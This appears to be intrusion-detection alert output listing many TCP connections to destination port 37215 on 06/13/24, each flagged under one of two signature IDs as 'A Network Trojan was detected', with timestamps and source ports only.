              Timestamp:06/13/24-21:31:59.177457
              SID:2829579
              Source Port:35474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679712
              SID:2835222
              Source Port:43974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040309
              SID:2829579
              Source Port:48386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440601
              SID:2829579
              Source Port:54450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931955
              SID:2829579
              Source Port:38748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213975
              SID:2829579
              Source Port:48736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124408
              SID:2835222
              Source Port:53374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439416
              SID:2829579
              Source Port:47022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271923
              SID:2835222
              Source Port:36904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378487
              SID:2829579
              Source Port:42236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.944124
              SID:2835222
              Source Port:54884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824249
              SID:2835222
              Source Port:60018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403138
              SID:2829579
              Source Port:57414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093545
              SID:2835222
              Source Port:52926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785820
              SID:2835222
              Source Port:51544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488241
              SID:2829579
              Source Port:39350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372891
              SID:2835222
              Source Port:48042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505677
              SID:2829579
              Source Port:48434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098547
              SID:2835222
              Source Port:51358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093098
              SID:2835222
              Source Port:45694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749768
              SID:2829579
              Source Port:42888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824159
              SID:2829579
              Source Port:42006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320409
              SID:2835222
              Source Port:41444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200284
              SID:2829579
              Source Port:45706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274767
              SID:2835222
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417869
              SID:2829579
              Source Port:57384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553888
              SID:2829579
              Source Port:49800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936507
              SID:2835222
              Source Port:54764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238961
              SID:2835222
              Source Port:38048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908739
              SID:2829579
              Source Port:38504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544580
              SID:2835222
              Source Port:50302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567520
              SID:2829579
              Source Port:44592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612059
              SID:2829579
              Source Port:47066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404601
              SID:2835222
              Source Port:59628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835140
              SID:2835222
              Source Port:60576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321066
              SID:2829579
              Source Port:46390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612240
              SID:2829579
              Source Port:60054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046214
              SID:2829579
              Source Port:33224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129992
              SID:2835222
              Source Port:56246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485787
              SID:2829579
              Source Port:41474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655843
              SID:2829579
              Source Port:57114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274762
              SID:2835222
              Source Port:49516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277467
              SID:2829579
              Source Port:48058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567846
              SID:2835222
              Source Port:39650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346833
              SID:2835222
              Source Port:58020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694531
              SID:2829579
              Source Port:55024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786904
              SID:2835222
              Source Port:47292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830482
              SID:2829579
              Source Port:48256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676023
              SID:2835222
              Source Port:41154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074491
              SID:2835222
              Source Port:48110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107609
              SID:2835222
              Source Port:46010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306365
              SID:2835222
              Source Port:48122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802070
              SID:2829579
              Source Port:48956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833215
              SID:2829579
              Source Port:33554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279503
              SID:2829579
              Source Port:41870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111308
              SID:2835222
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438330
              SID:2835222
              Source Port:40330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247475
              SID:2829579
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259315
              SID:2835222
              Source Port:51182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347396
              SID:2829579
              Source Port:49396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344210
              SID:2835222
              Source Port:45880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910373
              SID:2829579
              Source Port:48062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196774
              SID:2835222
              Source Port:48652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028572
              SID:2835222
              Source Port:53566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195645
              SID:2829579
              Source Port:53860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357222
              SID:2835222
              Source Port:34468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109356
              SID:2829579
              Source Port:38956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306916
              SID:2835222
              Source Port:45324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369348
              SID:2829579
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210799
              SID:2829579
              Source Port:55052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271708
              SID:2835222
              Source Port:37216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545229
              SID:2829579
              Source Port:49362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415987
              SID:2829579
              Source Port:33524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212071
              SID:2829579
              Source Port:52820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487351
              SID:2829579
              Source Port:53824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157234
              SID:2829579
              Source Port:46794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275646
              SID:2835222
              Source Port:42418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629144
              SID:2829579
              Source Port:57546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216717
              SID:2829579
              Source Port:42102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614536
              SID:2835222
              Source Port:41854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710321
              SID:2835222
              Source Port:53562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908057
              SID:2829579
              Source Port:36626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259270
              SID:2829579
              Source Port:55296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274687
              SID:2835222
              Source Port:58718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457111
              SID:2835222
              Source Port:60798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554310
              SID:2829579
              Source Port:39342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176516
              SID:2835222
              Source Port:51012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486558
              SID:2835222
              Source Port:51642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695455
              SID:2829579
              Source Port:42810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568355
              SID:2835222
              Source Port:58018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632645
              SID:2829579
              Source Port:38652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222581
              SID:2829579
              Source Port:48704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457346
              SID:2829579
              Source Port:40192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838355
              SID:2835222
              Source Port:41724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131778
              SID:2835222
              Source Port:52306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707218
              SID:2829579
              Source Port:48836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459028
              SID:2835222
              Source Port:52224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567744
              SID:2829579
              Source Port:57966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783048
              SID:2835222
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509336
              SID:2829579
              Source Port:33046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.125760
              SID:2835222
              Source Port:42984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546068
              SID:2835222
              Source Port:34156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676962
              SID:2835222
              Source Port:47956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039137
              SID:2835222
              Source Port:55020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420551
              SID:2835222
              Source Port:45790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.113793
              SID:2829579
              Source Port:41852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276433
              SID:2829579
              Source Port:57210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941669
              SID:2829579
              Source Port:51144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417334
              SID:2829579
              Source Port:50470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974925
              SID:2829579
              Source Port:40760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804700
              SID:2829579
              Source Port:49464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091995
              SID:2829579
              Source Port:56994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155436
              SID:2829579
              Source Port:50404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132565
              SID:2829579
              Source Port:55694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630543
              SID:2835222
              Source Port:48420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060701
              SID:2835222
              Source Port:32954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841142
              SID:2829579
              Source Port:60206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310479
              SID:2835222
              Source Port:43570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377060
              SID:2829579
              Source Port:56734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839021
              SID:2835222
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093639
              SID:2835222
              Source Port:60456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229177
              SID:2829579
              Source Port:43522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247243
              SID:2829579
              Source Port:57546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615231
              SID:2829579
              Source Port:49324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023603
              SID:2835222
              Source Port:41748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091684
              SID:2835222
              Source Port:36466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424132
              SID:2835222
              Source Port:52806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229335
              SID:2829579
              Source Port:59418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749810
              SID:2835222
              Source Port:41462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555360
              SID:2829579
              Source Port:57624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978513
              SID:2835222
              Source Port:54262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971778
              SID:2829579
              Source Port:49924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908172
              SID:2829579
              Source Port:50886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346146
              SID:2829579
              Source Port:55294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350737
              SID:2829579
              Source Port:35834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436639
              SID:2835222
              Source Port:42454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231805
              SID:2829579
              Source Port:51792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911500
              SID:2835222
              Source Port:40036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757354
              SID:2835222
              Source Port:52016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936429
              SID:2835222
              Source Port:34256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374263
              SID:2835222
              Source Port:34812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.310202
              SID:2829579
              Source Port:43522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525875
              SID:2829579
              Source Port:48494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507656
              SID:2829579
              Source Port:50898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728302
              SID:2829579
              Source Port:34422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679965
              SID:2829579
              Source Port:46124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154550
              SID:2835222
              Source Port:42644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244117
              SID:2829579
              Source Port:35560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307026
              SID:2835222
              Source Port:49060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547419
              SID:2835222
              Source Port:43302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159049
              SID:2829579
              Source Port:45294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657255
              SID:2835222
              Source Port:42800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158033
              SID:2829579
              Source Port:47980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404767
              SID:2829579
              Source Port:52876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088859
              SID:2829579
              Source Port:51382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180680
              SID:2829579
              Source Port:46608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752073
              SID:2835222
              Source Port:35130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424341
              SID:2835222
              Source Port:59668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503335
              SID:2829579
              Source Port:56606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697608
              SID:2829579
              Source Port:43152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419532
              SID:2829579
              Source Port:60520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422231
              SID:2835222
              Source Port:49858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888854
              SID:2835222
              Source Port:60234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.310328
              SID:2835222
              Source Port:43626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132655
              SID:2835222
              Source Port:47702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159014
              SID:2835222
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153228
              SID:2835222
              Source Port:51286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132305
              SID:2835222
              Source Port:46246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303168
              SID:2829579
              Source Port:57756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727350
              SID:2829579
              Source Port:37528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404439
              SID:2829579
              Source Port:57432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160134
              SID:2835222
              Source Port:59902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990249
              SID:2829579
              Source Port:38900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569083
              SID:2829579
              Source Port:50358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257672
              SID:2829579
              Source Port:33174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194325
              SID:2835222
              Source Port:50178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780064
              SID:2835222
              Source Port:54400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077923
              SID:2835222
              Source Port:56480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676538
              SID:2829579
              Source Port:47976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025751
              SID:2829579
              Source Port:58768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348592
              SID:2829579
              Source Port:42824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025275
              SID:2829579
              Source Port:39298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569724
              SID:2835222
              Source Port:52414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264314
              SID:2835222
              Source Port:37702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403166
              SID:2829579
              Source Port:39454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193731
              SID:2835222
              Source Port:34276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376251
              SID:2835222
              Source Port:48940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136448
              SID:2829579
              Source Port:57098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678214
              SID:2829579
              Source Port:42270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023821
              SID:2829579
              Source Port:56266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730662
              SID:2829579
              Source Port:38708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804158
              SID:2835222
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868443
              SID:2835222
              Source Port:59478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370885
              SID:2835222
              Source Port:38254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275008
              SID:2835222
              Source Port:51872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377404
              SID:2829579
              Source Port:41828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213849
              SID:2835222
              Source Port:55712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228585
